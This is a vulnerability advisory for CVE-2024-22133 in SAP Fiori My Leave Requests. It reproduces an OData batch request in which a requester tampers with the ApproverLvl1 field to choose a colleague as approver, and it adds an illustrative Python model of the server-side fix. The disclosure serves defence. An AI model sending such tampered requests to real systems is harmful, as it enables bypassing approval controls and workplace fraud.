usd-2023-0042 | Improper Access Control in Leave Requests

Advisory ID: usd-2023-0042
Product: SAP Fiori - My Leave Requests (Version 3/Fiori 2.0)
Affected Version: Component: GBX01HR5 605 0020, Support Package: SAPK-60520INGBX01HR5
Vulnerability Type: CWE-284: Improper Access Control
Security Risk: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N (Medium)
Vendor URL: https://www.sap.com
Vendor Acknowledged Vulnerability: Yes
Vendor Status: Fixed
CVE Number: CVE-2024-22133
CVE Link: CVE-2024-22133

Affected Component(s)

SAP Fiori Application My Leave Requests (Version 3/Fiori 2.0)
https://fioriappslibrary.hana.ondemand.com/sap/fix/externalViewer/#/detail/Apps('F1311A')/W38

Description

Leave requests can be submitted via the application. The requester's supervisor is stored as the approver, and the approver cannot be changed via the front end.

Via the OData backend API call, which is sent as soon as a leave request is submitted, any other employee can be set as the approver.

Proof of Concept

During a leave request, the following request is sent to the OData backend:

POST /sap/opu/odata/sap/HCMFAB_LEAVE_REQUEST_CR_SRV/$batch?sap-client=001 HTTP/2
Host: <sap-fiori-host>

[...]

--batch_ee60-88db-eb95
Content-Type: multipart/mixed; boundary=changeset_4f6a-f52d-09f8

--changeset_4f6a-f52d-09f8
Content-Type: application/http
Content-Transfer-Encoding: binary

POST LeaveRequestSet?sap-client=001 HTTP/1.1
Content-Type: application/json
sap-contextid-accept: header
Accept: application/json
x-csrf-token: GArPMRDcc1-LL4y1wfsAIA==
Accept-Language: en
DataServiceVersion: 2.0
MaxDataServiceVersion: 2.0
Content-Length: 375

{
"StartDate":"\/Date(1702252800000)\/","EndDate":"\/Date(1702252800000)\/","StartTime":"","EndTime":"",
"__metadata":{"type":"HCMFAB_LEAVE_REQUEST_CR_SRV.LeaveRequest"},
"EmployeeID":"00204915","AbsenceTypeName":"Urlaub","AbsenceTypeCode":"0100",
"ApproverLvl1":{"Name":"<ApproverName>","Pernr":"00204914","Seqnr":"001","DefaultFlag":false},
"Notes":"","IsMultiLevelApproval":false
}

--changeset_4f6a-f52d-09f8--

--batch_ee60-88db-eb95--

As can be seen in line 28 of the request (the ApproverLvl1 object), the approver is also sent by the client. This means that any other personnel number can be set as the approver. If the requester's own personnel number is set, the leave request is still created successfully, but it is not possible to approve one's own leave request. As already mentioned, however, any other personnel number can be specified, and that person can then approve the request.

Fix

It is recommended to restrict access to sensitive functions or information by default. Required access privileges should be granted explicitly by a global access control mechanism. Furthermore, the approver must not be manipulable by the client: the back end should derive it from the employee's organizational assignment and ignore any approver value supplied in the request body.
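The following Python is added here as an illustration of the proof of concept and of the fix described above; it is not SAP's code or the application's own implementation. It parses the $batch changeset shown in the proof of concept to extract the submitted leave request, then models the server-side rule from the fix: the approver is derived from a (constructed) HR master data lookup keyed on the authenticated personnel number, and the client-supplied ApproverLvl1 is ignored and recorded as a finding so that a mismatch can be alerted on. The sample batch body, the LINE_MANAGER table and all function names are assumptions made for the example.

```python
import json
import re

# Constructed sample of the $batch body from the proof of concept (headers that do
# not matter for parsing were left out). The requester 00204915 sets 00204914 as
# ApproverLvl1, which is the manipulation the advisory describes.
SAMPLE_BATCH = r"""--batch_ee60-88db-eb95
Content-Type: multipart/mixed; boundary=changeset_4f6a-f52d-09f8

--changeset_4f6a-f52d-09f8
Content-Type: application/http
Content-Transfer-Encoding: binary

POST LeaveRequestSet?sap-client=001 HTTP/1.1
Content-Type: application/json
Accept: application/json

{"StartDate":"\/Date(1702252800000)\/","EndDate":"\/Date(1702252800000)\/",
"__metadata":{"type":"HCMFAB_LEAVE_REQUEST_CR_SRV.LeaveRequest"},
"EmployeeID":"00204915","AbsenceTypeName":"Urlaub","AbsenceTypeCode":"0100",
"ApproverLvl1":{"Name":"<ApproverName>","Pernr":"00204914","Seqnr":"001","DefaultFlag":false},
"Notes":"","IsMultiLevelApproval":false}

--changeset_4f6a-f52d-09f8--

--batch_ee60-88db-eb95--
"""

# Constructed HR master data: personnel number -> line manager. This stands in for
# the organizational lookup the back end must perform itself; it is not SAP's model.
LINE_MANAGER = {
    "00204915": "00201000",
    "00204914": "00201000",
}


def extract_leave_requests(batch_body: str, batch_boundary: str) -> list:
    """Return the decoded JSON body of every POST LeaveRequestSet in a $batch."""
    results = []
    for part in batch_body.split("--" + batch_boundary):
        part = part.strip()
        if not part or part == "--":          # preamble / closing delimiter
            continue
        # Batch part: MIME headers, blank line, then the changeset content.
        hdrs, _, content = part.partition("\n\n")
        match = re.search(r"boundary=([^\s;]+)", hdrs)
        if not match:
            continue
        for cs_part in content.split("--" + match.group(1)):
            cs_part = cs_part.strip()
            if not cs_part or cs_part == "--":
                continue
            # Changeset part: MIME headers, blank line, embedded HTTP request.
            _, _, http_req = cs_part.partition("\n\n")
            request_line, _, rest = http_req.partition("\n")
            if not request_line.startswith("POST LeaveRequestSet"):
                continue
            _headers, _, body = rest.partition("\n\n")
            results.append(json.loads(body))
    return results


def create_leave_request(payload: dict, authenticated_pernr: str) -> dict:
    """Model of the hardened create handler.

    The employee is taken from the authenticated session, the approver from
    HR master data. ApproverLvl1 from the client is never used; a value that
    differs from the derived approver is recorded in Findings for alerting.
    """
    findings = []
    if payload.get("EmployeeID") != authenticated_pernr:
        findings.append("EmployeeID in body does not match authenticated user")
    approver = LINE_MANAGER.get(authenticated_pernr)
    if approver is None:
        raise PermissionError("no approver defined for employee")
    sent = (payload.get("ApproverLvl1") or {}).get("Pernr")
    if sent is not None and sent != approver:
        findings.append(f"client-supplied approver {sent} ignored, using {approver}")
    return {
        "EmployeeID": authenticated_pernr,
        "ApproverLvl1": {"Pernr": approver, "Seqnr": "001", "DefaultFlag": True},
        "AbsenceTypeCode": payload.get("AbsenceTypeCode"),
        "StartDate": payload.get("StartDate"),
        "EndDate": payload.get("EndDate"),
        "Findings": findings,
    }


def check_sample() -> dict:
    """Run the proof-of-concept request through the hardened handler."""
    requests = extract_leave_requests(SAMPLE_BATCH, "batch_ee60-88db-eb95")
    return create_leave_request(requests[0], authenticated_pernr="00204915")


if __name__ == "__main__":
    print(json.dumps(check_sample(), indent=2))
```

The handler overwrites rather than rejects a client-supplied approver so that existing front ends which echo the default approver keep working, while the recorded finding gives the security operations team a signal that a request tried to choose its own approver.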

References

https://cwe.mitre.org/data/definitions/284.html

Timeline

  • 2023-12-06: First contact request via SAP's Vulnerability Disclosure Form.
  • 2023-12-21: The vulnerability is confirmed by SAP and a fix is in the works.
  • 2024-05-12: SAP released the patch in SAP Note 3417399.

Credits

This security vulnerability was identified by Ole Wagner of usd AG.